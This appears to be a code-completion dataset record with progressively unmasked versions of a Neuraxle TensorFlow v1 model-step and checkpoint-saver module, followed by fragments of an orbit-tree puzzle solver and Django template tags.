expected_outputs: expected outputs to fit on\n :return: fitted self\n :rtype: BaseStep\n \"\"\"\n feed_dict = {self['data_inputs']: data_inputs}\n if self.has_expected_outputs:\n feed_dict.update({self['expected_outputs']: expected_outputs})\n if self.create_inputs is not None:\n additional_feed_dict_arguments = self.create_inputs(self,\n data_inputs, expected_outputs)\n feed_dict.update(additional_feed_dict_arguments)\n results = self.session.run([self['optimizer'], self['loss']],\n feed_dict=feed_dict)\n loss = results[1]\n self.add_new_loss(loss)\n return self\n\n def transform(self, data_inputs, expected_outputs=None) ->'BaseStep':\n with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):\n return self.transform_model(data_inputs)\n\n def transform_model(self, data_inputs):\n \"\"\"\n Transform tensorflow model using the variable scope.\n\n :param data_inputs:\n :return:\n \"\"\"\n inference_output_name = self._get_inference_output_name()\n feed_dict = {self['data_inputs']: data_inputs}\n results = self.session.run([self[inference_output_name], self[\n 'loss']], feed_dict=feed_dict)\n self.add_new_loss(results[1], test_only=True)\n return results[0]\n <mask token>\n <mask token>\n\n\nclass TensorflowV1StepSaver(BaseSaver):\n \"\"\"\n Step saver for a tensorflow Session using tf.train.Saver().\n It saves, or restores the tf.Session() checkpoint at the context path using the step name as file name.\n\n .. seealso::\n `Using the saved model format <https://www.tensorflow.org/guide/saved_model>`_,\n :class:`~neuraxle.base.BaseSaver`\n \"\"\"\n\n def save_step(self, step: 'TensorflowV1ModelStep', context:\n 'ExecutionContext') ->'BaseStep':\n \"\"\"\n Save a step that is using tf.train.Saver().\n :param step: step to save\n :type step: BaseStep\n :param context: execution context to save from\n :type context: ExecutionContext\n :return: saved step\n \"\"\"\n with step.graph.as_default():\n saver = tf.train.Saver()\n saver.save(step.session, self._get_saved_model_path(context, step))\n step.strip()\n return step\n\n def load_step(self, step: 'TensorflowV1ModelStep', context:\n 'ExecutionContext') ->'BaseStep':\n \"\"\"\n Load a step that is using tensorflow using tf.train.Saver().\n :param step: step to load\n :type step: BaseStep\n :param context: execution context to load from\n :type context: ExecutionContext\n :return: loaded step\n \"\"\"\n step.is_initialized = False\n step.setup(context)\n with step.graph.as_default():\n saver = tf.train.Saver()\n saver.restore(step.session, self._get_saved_model_path(context,\n step))\n return step\n\n def can_load(self, step: 'TensorflowV1ModelStep', context:\n 'ExecutionContext'):\n \"\"\"\n Returns whether or not we can load.\n :param step: step to load\n :type step: BaseStep\n :param context: execution context to load from\n :type context: ExecutionContext\n :return: loaded step\n \"\"\"\n meta_exists = os.path.exists(os.path.join(context.get_path(),\n '{0}.ckpt.meta'.format(step.get_name())))\n index_exists = os.path.exists(os.path.join(context.get_path(),\n '{0}.ckpt.index'.format(step.get_name())))\n return meta_exists and index_exists\n\n def _get_saved_model_path(self, context: ExecutionContext, step: BaseStep):\n \"\"\"\n Returns the saved model path using the given execution context, and step name.\n :param step: step to load\n :type step: BaseStep\n :param context: execution context to load from\n :type context: ExecutionContext\n :return: loaded step\n \"\"\"\n return os.path.join(context.get_path(), '{0}.ckpt'.format(step.\n get_name()))\n",
"step-3": "<mask token>\n\n\nclass TensorflowV1ModelStep(BaseTensorflowModelStep):\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, create_graph, create_loss, create_optimizer,\n create_feed_dict=None, data_inputs_dtype=None,\n expected_outputs_dtype=None, variable_scope=None,\n has_expected_outputs=True, print_loss=False, print_func=None):\n BaseTensorflowModelStep.__init__(self, create_model=create_graph,\n create_loss=create_loss, create_optimizer=create_optimizer,\n create_inputs=create_feed_dict, data_inputs_dtype=\n data_inputs_dtype, expected_outputs_dtype=\n expected_outputs_dtype, step_saver=TensorflowV1StepSaver(),\n print_loss=print_loss, print_func=print_func)\n if variable_scope is None:\n variable_scope = self.name\n self.variable_scope = variable_scope\n self.has_expected_outputs = has_expected_outputs\n self.create_feed_dict = create_feed_dict\n\n def setup(self, context: ExecutionContext) ->BaseStep:\n \"\"\"\n Setup tensorflow 1 graph, and session using a variable scope.\n\n :return: self\n :rtype: BaseStep\n \"\"\"\n if self.is_initialized:\n return self\n self.graph = tf.Graph()\n with self.graph.as_default():\n with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):\n self.session = tf.Session(config=tf.ConfigProto(\n log_device_placement=True), graph=self.graph)\n model = self.create_model(self, context)\n if not isinstance(model, tuple):\n tf.identity(model, name='output')\n else:\n tf.identity(model[0], name='output')\n tf.identity(model[1], name='inference_output')\n tf.identity(self.create_loss(self), name='loss')\n self.create_optimizer(self, context).minimize(self['loss'],\n name='optimizer')\n init = tf.global_variables_initializer()\n self.session.run(init)\n self.is_initialized = True\n\n def teardown(self) ->BaseStep:\n \"\"\"\n Close session on teardown.\n\n :return:\n \"\"\"\n if self.session is not None:\n self.session.close()\n self.is_initialized = False\n return self\n\n def strip(self):\n \"\"\"\n Strip tensorflow 1 properties from to step to make the step serializable.\n\n :return: stripped step\n :rtype: BaseStep\n \"\"\"\n self.graph = None\n self.session = None\n return self\n\n def fit(self, data_inputs, expected_outputs=None) ->'BaseStep':\n with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):\n return self.fit_model(data_inputs, expected_outputs)\n\n def fit_model(self, data_inputs, expected_outputs=None) ->BaseStep:\n \"\"\"\n Fit tensorflow model using the variable scope.\n\n :param data_inputs: data inputs\n :param expected_outputs: expected outputs to fit on\n :return: fitted self\n :rtype: BaseStep\n \"\"\"\n feed_dict = {self['data_inputs']: data_inputs}\n if self.has_expected_outputs:\n feed_dict.update({self['expected_outputs']: expected_outputs})\n if self.create_inputs is not None:\n additional_feed_dict_arguments = self.create_inputs(self,\n data_inputs, expected_outputs)\n feed_dict.update(additional_feed_dict_arguments)\n results = self.session.run([self['optimizer'], self['loss']],\n feed_dict=feed_dict)\n loss = results[1]\n self.add_new_loss(loss)\n return self\n\n def transform(self, data_inputs, expected_outputs=None) ->'BaseStep':\n with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):\n return self.transform_model(data_inputs)\n\n def transform_model(self, data_inputs):\n \"\"\"\n Transform tensorflow model using the variable scope.\n\n :param data_inputs:\n :return:\n \"\"\"\n inference_output_name = self._get_inference_output_name()\n feed_dict = {self['data_inputs']: data_inputs}\n results = self.session.run([self[inference_output_name], self[\n 'loss']], feed_dict=feed_dict)\n self.add_new_loss(results[1], test_only=True)\n return results[0]\n\n def _get_inference_output_name(self):\n \"\"\"\n Return the output tensor name for inference (transform).\n In create_graph, the user can return a tuple of two elements : the output tensor for training, and the output tensor for inference.\n\n :return:\n \"\"\"\n inference_output_name = 'output'\n if len(self['inference_output'].get_shape().as_list()) > 0:\n inference_output_name = 'inference_output'\n return inference_output_name\n <mask token>\n\n\nclass TensorflowV1StepSaver(BaseSaver):\n \"\"\"\n Step saver for a tensorflow Session using tf.train.Saver().\n It saves, or restores the tf.Session() checkpoint at the context path using the step name as file name.\n\n .. seealso::\n `Using the saved model format <https://www.tensorflow.org/guide/saved_model>`_,\n :class:`~neuraxle.base.BaseSaver`\n \"\"\"\n\n def save_step(self, step: 'TensorflowV1ModelStep', context:\n 'ExecutionContext') ->'BaseStep':\n \"\"\"\n Save a step that is using tf.train.Saver().\n :param step: step to save\n :type step: BaseStep\n :param context: execution context to save from\n :type context: ExecutionContext\n :return: saved step\n \"\"\"\n with step.graph.as_default():\n saver = tf.train.Saver()\n saver.save(step.session, self._get_saved_model_path(context, step))\n step.strip()\n return step\n\n def load_step(self, step: 'TensorflowV1ModelStep', context:\n 'ExecutionContext') ->'BaseStep':\n \"\"\"\n Load a step that is using tensorflow using tf.train.Saver().\n :param step: step to load\n :type step: BaseStep\n :param context: execution context to load from\n :type context: ExecutionContext\n :return: loaded step\n \"\"\"\n step.is_initialized = False\n step.setup(context)\n with step.graph.as_default():\n saver = tf.train.Saver()\n saver.restore(step.session, self._get_saved_model_path(context,\n step))\n return step\n\n def can_load(self, step: 'TensorflowV1ModelStep', context:\n 'ExecutionContext'):\n \"\"\"\n Returns whether or not we can load.\n :param step: step to load\n :type step: BaseStep\n :param context: execution context to load from\n :type context: ExecutionContext\n :return: loaded step\n \"\"\"\n meta_exists = os.path.exists(os.path.join(context.get_path(),\n '{0}.ckpt.meta'.format(step.get_name())))\n index_exists = os.path.exists(os.path.join(context.get_path(),\n '{0}.ckpt.index'.format(step.get_name())))\n return meta_exists and index_exists\n\n def _get_saved_model_path(self, context: ExecutionContext, step: BaseStep):\n \"\"\"\n Returns the saved model path using the given execution context, and step name.\n :param step: step to load\n :type step: BaseStep\n :param context: execution context to load from\n :type context: ExecutionContext\n :return: loaded step\n \"\"\"\n return os.path.join(context.get_path(), '{0}.ckpt'.format(step.\n get_name()))\n",
"step-4": "<mask token>\n\n\nclass TensorflowV1ModelStep(BaseTensorflowModelStep):\n \"\"\"\n Base class for tensorflow 1 steps.\n It uses :class:`TensorflowV1StepSaver` for saving the model.\n\n .. seealso::\n `Using the saved model format <https://www.tensorflow.org/guide/checkpoint>`_,\n :class:`~neuraxle.base.BaseStep`\n \"\"\"\n HYPERPARAMS = HyperparameterSamples({})\n HYPERPARAMS_SPACE = HyperparameterSpace({})\n\n def __init__(self, create_graph, create_loss, create_optimizer,\n create_feed_dict=None, data_inputs_dtype=None,\n expected_outputs_dtype=None, variable_scope=None,\n has_expected_outputs=True, print_loss=False, print_func=None):\n BaseTensorflowModelStep.__init__(self, create_model=create_graph,\n create_loss=create_loss, create_optimizer=create_optimizer,\n create_inputs=create_feed_dict, data_inputs_dtype=\n data_inputs_dtype, expected_outputs_dtype=\n expected_outputs_dtype, step_saver=TensorflowV1StepSaver(),\n print_loss=print_loss, print_func=print_func)\n if variable_scope is None:\n variable_scope = self.name\n self.variable_scope = variable_scope\n self.has_expected_outputs = has_expected_outputs\n self.create_feed_dict = create_feed_dict\n\n def setup(self, context: ExecutionContext) ->BaseStep:\n \"\"\"\n Setup tensorflow 1 graph, and session using a variable scope.\n\n :return: self\n :rtype: BaseStep\n \"\"\"\n if self.is_initialized:\n return self\n self.graph = tf.Graph()\n with self.graph.as_default():\n with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):\n self.session = tf.Session(config=tf.ConfigProto(\n log_device_placement=True), graph=self.graph)\n model = self.create_model(self, context)\n if not isinstance(model, tuple):\n tf.identity(model, name='output')\n else:\n tf.identity(model[0], name='output')\n tf.identity(model[1], name='inference_output')\n tf.identity(self.create_loss(self), name='loss')\n self.create_optimizer(self, context).minimize(self['loss'],\n name='optimizer')\n init = tf.global_variables_initializer()\n self.session.run(init)\n self.is_initialized = True\n\n def teardown(self) ->BaseStep:\n \"\"\"\n Close session on teardown.\n\n :return:\n \"\"\"\n if self.session is not None:\n self.session.close()\n self.is_initialized = False\n return self\n\n def strip(self):\n \"\"\"\n Strip tensorflow 1 properties from to step to make the step serializable.\n\n :return: stripped step\n :rtype: BaseStep\n \"\"\"\n self.graph = None\n self.session = None\n return self\n\n def fit(self, data_inputs, expected_outputs=None) ->'BaseStep':\n with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):\n return self.fit_model(data_inputs, expected_outputs)\n\n def fit_model(self, data_inputs, expected_outputs=None) ->BaseStep:\n \"\"\"\n Fit tensorflow model using the variable scope.\n\n :param data_inputs: data inputs\n :param expected_outputs: expected outputs to fit on\n :return: fitted self\n :rtype: BaseStep\n \"\"\"\n feed_dict = {self['data_inputs']: data_inputs}\n if self.has_expected_outputs:\n feed_dict.update({self['expected_outputs']: expected_outputs})\n if self.create_inputs is not None:\n additional_feed_dict_arguments = self.create_inputs(self,\n data_inputs, expected_outputs)\n feed_dict.update(additional_feed_dict_arguments)\n results = self.session.run([self['optimizer'], self['loss']],\n feed_dict=feed_dict)\n loss = results[1]\n self.add_new_loss(loss)\n return self\n\n def transform(self, data_inputs, expected_outputs=None) ->'BaseStep':\n with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):\n return self.transform_model(data_inputs)\n\n def transform_model(self, data_inputs):\n \"\"\"\n Transform tensorflow model using the variable scope.\n\n :param data_inputs:\n :return:\n \"\"\"\n inference_output_name = self._get_inference_output_name()\n feed_dict = {self['data_inputs']: data_inputs}\n results = self.session.run([self[inference_output_name], self[\n 'loss']], feed_dict=feed_dict)\n self.add_new_loss(results[1], test_only=True)\n return results[0]\n\n def _get_inference_output_name(self):\n \"\"\"\n Return the output tensor name for inference (transform).\n In create_graph, the user can return a tuple of two elements : the output tensor for training, and the output tensor for inference.\n\n :return:\n \"\"\"\n inference_output_name = 'output'\n if len(self['inference_output'].get_shape().as_list()) > 0:\n inference_output_name = 'inference_output'\n return inference_output_name\n\n def __getitem__(self, item):\n \"\"\"\n Get a graph tensor by name using get item.\n\n :param item: tensor name\n :type item: str\n\n :return: tensor\n :rtype: tf.Tensor\n \"\"\"\n if ':' in item:\n split = item.split(':')\n tensor_name = split[0]\n device = split[1]\n else:\n tensor_name = item\n device = '0'\n try:\n result = self.graph.get_tensor_by_name('{0}/{1}:{2}'.format(\n self.variable_scope, tensor_name, device))\n except KeyError:\n result = None\n if result is None:\n try:\n result = self.graph.get_operation_by_name('{0}/{1}'.format(\n self.variable_scope, tensor_name))\n except KeyError:\n result = tf.get_variable(tensor_name, [])\n return result\n\n\nclass TensorflowV1StepSaver(BaseSaver):\n \"\"\"\n Step saver for a tensorflow Session using tf.train.Saver().\n It saves, or restores the tf.Session() checkpoint at the context path using the step name as file name.\n\n .. seealso::\n `Using the saved model format <https://www.tensorflow.org/guide/saved_model>`_,\n :class:`~neuraxle.base.BaseSaver`\n \"\"\"\n\n def save_step(self, step: 'TensorflowV1ModelStep', context:\n 'ExecutionContext') ->'BaseStep':\n \"\"\"\n Save a step that is using tf.train.Saver().\n :param step: step to save\n :type step: BaseStep\n :param context: execution context to save from\n :type context: ExecutionContext\n :return: saved step\n \"\"\"\n with step.graph.as_default():\n saver = tf.train.Saver()\n saver.save(step.session, self._get_saved_model_path(context, step))\n step.strip()\n return step\n\n def load_step(self, step: 'TensorflowV1ModelStep', context:\n 'ExecutionContext') ->'BaseStep':\n \"\"\"\n Load a step that is using tensorflow using tf.train.Saver().\n :param step: step to load\n :type step: BaseStep\n :param context: execution context to load from\n :type context: ExecutionContext\n :return: loaded step\n \"\"\"\n step.is_initialized = False\n step.setup(context)\n with step.graph.as_default():\n saver = tf.train.Saver()\n saver.restore(step.session, self._get_saved_model_path(context,\n step))\n return step\n\n def can_load(self, step: 'TensorflowV1ModelStep', context:\n 'ExecutionContext'):\n \"\"\"\n Returns whether or not we can load.\n :param step: step to load\n :type step: BaseStep\n :param context: execution context to load from\n :type context: ExecutionContext\n :return: loaded step\n \"\"\"\n meta_exists = os.path.exists(os.path.join(context.get_path(),\n '{0}.ckpt.meta'.format(step.get_name())))\n index_exists = os.path.exists(os.path.join(context.get_path(),\n '{0}.ckpt.index'.format(step.get_name())))\n return meta_exists and index_exists\n\n def _get_saved_model_path(self, context: ExecutionContext, step: BaseStep):\n \"\"\"\n Returns the saved model path using the given execution context, and step name.\n :param step: step to load\n :type step: BaseStep\n :param context: execution context to load from\n :type context: ExecutionContext\n :return: loaded step\n \"\"\"\n return os.path.join(context.get_path(), '{0}.ckpt'.format(step.\n get_name()))\n",
"step-5": "\"\"\"\nNeuraxle Tensorflow V1 Utility classes\n=========================================\nNeuraxle utility classes for tensorflow v1.\n\n..\n Copyright 2019, Neuraxio Inc.\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n http://www.apache.org/licenses/LICENSE-2.0\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\n\"\"\"\nimport os\n\nimport tensorflow as tf\nfrom neuraxle.base import BaseSaver, BaseStep, ExecutionContext\nfrom neuraxle.hyperparams.space import HyperparameterSamples, HyperparameterSpace\n\nfrom neuraxle_tensorflow.tensorflow import BaseTensorflowModelStep\n\n\nclass TensorflowV1ModelStep(BaseTensorflowModelStep):\n \"\"\"\n Base class for tensorflow 1 steps.\n It uses :class:`TensorflowV1StepSaver` for saving the model.\n\n .. seealso::\n `Using the saved model format <https://www.tensorflow.org/guide/checkpoint>`_,\n :class:`~neuraxle.base.BaseStep`\n \"\"\"\n HYPERPARAMS = HyperparameterSamples({})\n HYPERPARAMS_SPACE = HyperparameterSpace({})\n\n def __init__(\n self,\n create_graph,\n create_loss,\n create_optimizer,\n create_feed_dict=None,\n data_inputs_dtype=None,\n expected_outputs_dtype=None,\n variable_scope=None,\n has_expected_outputs=True,\n print_loss=False,\n print_func=None\n ):\n BaseTensorflowModelStep.__init__(\n self,\n create_model=create_graph,\n create_loss=create_loss,\n create_optimizer=create_optimizer,\n create_inputs=create_feed_dict,\n data_inputs_dtype=data_inputs_dtype,\n expected_outputs_dtype=expected_outputs_dtype,\n step_saver=TensorflowV1StepSaver(),\n print_loss=print_loss,\n print_func=print_func\n )\n\n if variable_scope is None:\n variable_scope = self.name\n self.variable_scope = variable_scope\n self.has_expected_outputs = has_expected_outputs\n self.create_feed_dict = create_feed_dict\n\n def setup(self, context: ExecutionContext) -> BaseStep:\n \"\"\"\n Setup tensorflow 1 graph, and session using a variable scope.\n\n :return: self\n :rtype: BaseStep\n \"\"\"\n if self.is_initialized:\n return self\n\n self.graph = tf.Graph()\n with self.graph.as_default():\n with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):\n self.session = tf.Session(config=tf.ConfigProto(log_device_placement=True), graph=self.graph)\n\n model = self.create_model(self, context)\n if not isinstance(model, tuple):\n tf.identity(model, name='output')\n else:\n tf.identity(model[0], name='output')\n tf.identity(model[1], name='inference_output')\n\n tf.identity(self.create_loss(self), name='loss')\n self.create_optimizer(self, context).minimize(self['loss'], name='optimizer')\n\n init = tf.global_variables_initializer()\n self.session.run(init)\n self.is_initialized = True\n\n def teardown(self) -> BaseStep:\n \"\"\"\n Close session on teardown.\n\n :return:\n \"\"\"\n if self.session is not None:\n self.session.close()\n self.is_initialized = False\n\n return self\n\n def strip(self):\n \"\"\"\n Strip tensorflow 1 properties from to step to make the step serializable.\n\n :return: stripped step\n :rtype: BaseStep\n \"\"\"\n self.graph = None\n self.session = None\n\n return self\n\n def fit(self, data_inputs, expected_outputs=None) -> 'BaseStep':\n with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):\n return self.fit_model(data_inputs, expected_outputs)\n\n def fit_model(self, data_inputs, expected_outputs=None) -> BaseStep:\n \"\"\"\n Fit tensorflow model using the variable scope.\n\n :param data_inputs: data inputs\n :param expected_outputs: expected outputs to fit on\n :return: fitted self\n :rtype: BaseStep\n \"\"\"\n feed_dict = {\n self['data_inputs']: data_inputs\n }\n\n if self.has_expected_outputs:\n feed_dict.update({\n self['expected_outputs']: expected_outputs\n })\n\n if self.create_inputs is not None:\n additional_feed_dict_arguments = self.create_inputs(self, data_inputs, expected_outputs)\n feed_dict.update(additional_feed_dict_arguments)\n\n results = self.session.run([self['optimizer'], self['loss']], feed_dict=feed_dict)\n\n loss = results[1]\n self.add_new_loss(loss)\n\n return self\n\n def transform(self, data_inputs, expected_outputs=None) -> 'BaseStep':\n with tf.variable_scope(self.variable_scope, reuse=tf.AUTO_REUSE):\n return self.transform_model(data_inputs)\n\n def transform_model(self, data_inputs):\n \"\"\"\n Transform tensorflow model using the variable scope.\n\n :param data_inputs:\n :return:\n \"\"\"\n inference_output_name = self._get_inference_output_name()\n\n feed_dict = {\n self['data_inputs']: data_inputs\n }\n\n results = self.session.run([self[inference_output_name], self['loss']], feed_dict=feed_dict)\n self.add_new_loss(results[1], test_only=True)\n\n return results[0]\n\n def _get_inference_output_name(self):\n \"\"\"\n Return the output tensor name for inference (transform).\n In create_graph, the user can return a tuple of two elements : the output tensor for training, and the output tensor for inference.\n\n :return:\n \"\"\"\n inference_output_name = 'output'\n if len(self['inference_output'].get_shape().as_list()) > 0:\n inference_output_name = 'inference_output'\n\n return inference_output_name\n\n def __getitem__(self, item):\n \"\"\"\n Get a graph tensor by name using get item.\n\n :param item: tensor name\n :type item: str\n\n :return: tensor\n :rtype: tf.Tensor\n \"\"\"\n if \":\" in item:\n split = item.split(\":\")\n tensor_name = split[0]\n device = split[1]\n else:\n tensor_name = item\n device = \"0\"\n\n try:\n result = self.graph.get_tensor_by_name(\"{0}/{1}:{2}\".format(self.variable_scope, tensor_name, device))\n except KeyError:\n result = None\n\n if result is None:\n try:\n result = self.graph.get_operation_by_name(\"{0}/{1}\".format(self.variable_scope, tensor_name))\n except KeyError:\n result = tf.get_variable(tensor_name, [])\n\n return result\n\n\nclass TensorflowV1StepSaver(BaseSaver):\n \"\"\"\n Step saver for a tensorflow Session using tf.train.Saver().\n It saves, or restores the tf.Session() checkpoint at the context path using the step name as file name.\n\n .. seealso::\n `Using the saved model format <https://www.tensorflow.org/guide/saved_model>`_,\n :class:`~neuraxle.base.BaseSaver`\n \"\"\"\n\n def save_step(self, step: 'TensorflowV1ModelStep', context: 'ExecutionContext') -> 'BaseStep':\n \"\"\"\n Save a step that is using tf.train.Saver().\n :param step: step to save\n :type step: BaseStep\n :param context: execution context to save from\n :type context: ExecutionContext\n :return: saved step\n \"\"\"\n with step.graph.as_default():\n saver = tf.train.Saver()\n saver.save(step.session, self._get_saved_model_path(context, step))\n step.strip()\n\n return step\n\n def load_step(self, step: 'TensorflowV1ModelStep', context: 'ExecutionContext') -> 'BaseStep':\n \"\"\"\n Load a step that is using tensorflow using tf.train.Saver().\n :param step: step to load\n :type step: BaseStep\n :param context: execution context to load from\n :type context: ExecutionContext\n :return: loaded step\n \"\"\"\n step.is_initialized = False\n step.setup(context)\n\n with step.graph.as_default():\n saver = tf.train.Saver()\n saver.restore(step.session, self._get_saved_model_path(context, step))\n\n return step\n\n def can_load(self, step: 'TensorflowV1ModelStep', context: 'ExecutionContext'):\n \"\"\"\n Returns whether or not we can load.\n :param step: step to load\n :type step: BaseStep\n :param context: execution context to load from\n :type context: ExecutionContext\n :return: loaded step\n \"\"\"\n meta_exists = os.path.exists(os.path.join(context.get_path(), \"{0}.ckpt.meta\".format(step.get_name())))\n index_exists = os.path.exists(os.path.join(context.get_path(), \"{0}.ckpt.index\".format(step.get_name())))\n\n return meta_exists and index_exists\n\n def _get_saved_model_path(self, context: ExecutionContext, step: BaseStep):\n \"\"\"\n Returns the saved model path using the given execution context, and step name.\n :param step: step to load\n :type step: BaseStep\n :param context: execution context to load from\n :type context: ExecutionContext\n :return: loaded step\n \"\"\"\n return os.path.join(context.get_path(), \"{0}.ckpt\".format(step.get_name()))\n",
"step-ids": [
13,
15,
16,
19,
21
]
}
|
[
13,
15,
16,
19,
21
] |
<|reserved_special_token_0|>
class Obj:
def __init__(self, name):
self.name = name
self.down = []
def add_child(self, obj):
self.down.append(obj)
def prnt(self, prev):
if not self.down:
print(prev + '=' + self.name)
else:
for d in self.down:
d.prnt(prev + '-' + self.name)
def distance(self, start):
d = start
if not self.down:
print(self.name, start)
for n in self.down:
d += n.distance(start + 1)
return d
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Obj:
def __init__(self, name):
self.name = name
self.down = []
def add_child(self, obj):
self.down.append(obj)
def prnt(self, prev):
if not self.down:
print(prev + '=' + self.name)
else:
for d in self.down:
d.prnt(prev + '-' + self.name)
def distance(self, start):
d = start
if not self.down:
print(self.name, start)
for n in self.down:
d += n.distance(start + 1)
return d
<|reserved_special_token_0|>
for c, o in effects:
obj = None
if o in orbits:
obj = orbits[o]
else:
obj = Obj(o)
orbits[o] = obj
if c in orbits:
orbits[c].add_child(obj)
else:
ctr = Obj(c)
ctr.add_child(obj)
orbits[c] = ctr
print(COM.distance(0))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Obj:
def __init__(self, name):
self.name = name
self.down = []
def add_child(self, obj):
self.down.append(obj)
def prnt(self, prev):
if not self.down:
print(prev + '=' + self.name)
else:
for d in self.down:
d.prnt(prev + '-' + self.name)
def distance(self, start):
d = start
if not self.down:
print(self.name, start)
for n in self.down:
d += n.distance(start + 1)
return d
COM = Obj('COM')
orbits = {}
orbits['COM'] = COM
effects = [x.strip().split(')') for x in list(sys.stdin)]
for c, o in effects:
obj = None
if o in orbits:
obj = orbits[o]
else:
obj = Obj(o)
orbits[o] = obj
if c in orbits:
orbits[c].add_child(obj)
else:
ctr = Obj(c)
ctr.add_child(obj)
orbits[c] = ctr
print(COM.distance(0))
<|reserved_special_token_1|>
import sys
class Obj:
def __init__(self, name):
self.name = name
self.down = []
def add_child(self, obj):
self.down.append(obj)
def prnt(self, prev):
if not self.down:
print(prev + '=' + self.name)
else:
for d in self.down:
d.prnt(prev + '-' + self.name)
def distance(self, start):
d = start
if not self.down:
print(self.name, start)
for n in self.down:
d += n.distance(start + 1)
return d
COM = Obj('COM')
orbits = {}
orbits['COM'] = COM
effects = [x.strip().split(')') for x in list(sys.stdin)]
for c, o in effects:
obj = None
if o in orbits:
obj = orbits[o]
else:
obj = Obj(o)
orbits[o] = obj
if c in orbits:
orbits[c].add_child(obj)
else:
ctr = Obj(c)
ctr.add_child(obj)
orbits[c] = ctr
print(COM.distance(0))
|
flexible
|
{
"blob_id": "7d3f4e0a5031f9ce618c568b440c7425489060a1",
"index": 4122,
"step-1": "<mask token>\n\n\nclass Obj:\n\n def __init__(self, name):\n self.name = name\n self.down = []\n\n def add_child(self, obj):\n self.down.append(obj)\n\n def prnt(self, prev):\n if not self.down:\n print(prev + '=' + self.name)\n else:\n for d in self.down:\n d.prnt(prev + '-' + self.name)\n\n def distance(self, start):\n d = start\n if not self.down:\n print(self.name, start)\n for n in self.down:\n d += n.distance(start + 1)\n return d\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Obj:\n\n def __init__(self, name):\n self.name = name\n self.down = []\n\n def add_child(self, obj):\n self.down.append(obj)\n\n def prnt(self, prev):\n if not self.down:\n print(prev + '=' + self.name)\n else:\n for d in self.down:\n d.prnt(prev + '-' + self.name)\n\n def distance(self, start):\n d = start\n if not self.down:\n print(self.name, start)\n for n in self.down:\n d += n.distance(start + 1)\n return d\n\n\n<mask token>\nfor c, o in effects:\n obj = None\n if o in orbits:\n obj = orbits[o]\n else:\n obj = Obj(o)\n orbits[o] = obj\n if c in orbits:\n orbits[c].add_child(obj)\n else:\n ctr = Obj(c)\n ctr.add_child(obj)\n orbits[c] = ctr\nprint(COM.distance(0))\n",
"step-3": "<mask token>\n\n\nclass Obj:\n\n def __init__(self, name):\n self.name = name\n self.down = []\n\n def add_child(self, obj):\n self.down.append(obj)\n\n def prnt(self, prev):\n if not self.down:\n print(prev + '=' + self.name)\n else:\n for d in self.down:\n d.prnt(prev + '-' + self.name)\n\n def distance(self, start):\n d = start\n if not self.down:\n print(self.name, start)\n for n in self.down:\n d += n.distance(start + 1)\n return d\n\n\nCOM = Obj('COM')\norbits = {}\norbits['COM'] = COM\neffects = [x.strip().split(')') for x in list(sys.stdin)]\nfor c, o in effects:\n obj = None\n if o in orbits:\n obj = orbits[o]\n else:\n obj = Obj(o)\n orbits[o] = obj\n if c in orbits:\n orbits[c].add_child(obj)\n else:\n ctr = Obj(c)\n ctr.add_child(obj)\n orbits[c] = ctr\nprint(COM.distance(0))\n",
"step-4": "import sys\n\n\nclass Obj:\n\n def __init__(self, name):\n self.name = name\n self.down = []\n\n def add_child(self, obj):\n self.down.append(obj)\n\n def prnt(self, prev):\n if not self.down:\n print(prev + '=' + self.name)\n else:\n for d in self.down:\n d.prnt(prev + '-' + self.name)\n\n def distance(self, start):\n d = start\n if not self.down:\n print(self.name, start)\n for n in self.down:\n d += n.distance(start + 1)\n return d\n\n\nCOM = Obj('COM')\norbits = {}\norbits['COM'] = COM\neffects = [x.strip().split(')') for x in list(sys.stdin)]\nfor c, o in effects:\n obj = None\n if o in orbits:\n obj = orbits[o]\n else:\n obj = Obj(o)\n orbits[o] = obj\n if c in orbits:\n orbits[c].add_child(obj)\n else:\n ctr = Obj(c)\n ctr.add_child(obj)\n orbits[c] = ctr\nprint(COM.distance(0))\n",
"step-5": null,
"step-ids": [
5,
6,
7,
8
]
}
|
[
5,
6,
7,
8
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@register.filter
def jsonify(object):
return mark_safe(json.dumps(object, cls=DjangoJSONEncoder))
@register.simple_tag
def get_crop_url(crop, width=None, scale=1):
if width:
return crop.url_at_width(width * scale)
else:
return crop.url_at_width(crop.width * scale)
@register.assignment_tag
def get_available_crop_scales(crop, width):
return crop.available_scales(width=width)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
register = template.Library()
@register.filter
def jsonify(object):
return mark_safe(json.dumps(object, cls=DjangoJSONEncoder))
@register.simple_tag
def get_crop_url(crop, width=None, scale=1):
if width:
return crop.url_at_width(width * scale)
else:
return crop.url_at_width(crop.width * scale)
@register.assignment_tag
def get_available_crop_scales(crop, width):
return crop.available_scales(width=width)
<|reserved_special_token_1|>
import json
from django import template
from django.core.serializers.json import DjangoJSONEncoder
from django.utils.safestring import mark_safe
register = template.Library()
@register.filter
def jsonify(object):
return mark_safe(json.dumps(object, cls=DjangoJSONEncoder))
@register.simple_tag
def get_crop_url(crop, width=None, scale=1):
if width:
return crop.url_at_width(width * scale)
else:
return crop.url_at_width(crop.width * scale)
@register.assignment_tag
def get_available_crop_scales(crop, width):
return crop.available_scales(width=width)
|
flexible
|
{
"blob_id": "987579da6b7ae208a66e375e0c9eca32b97199c5",
"index": 4704,
"step-1": "<mask token>\n",
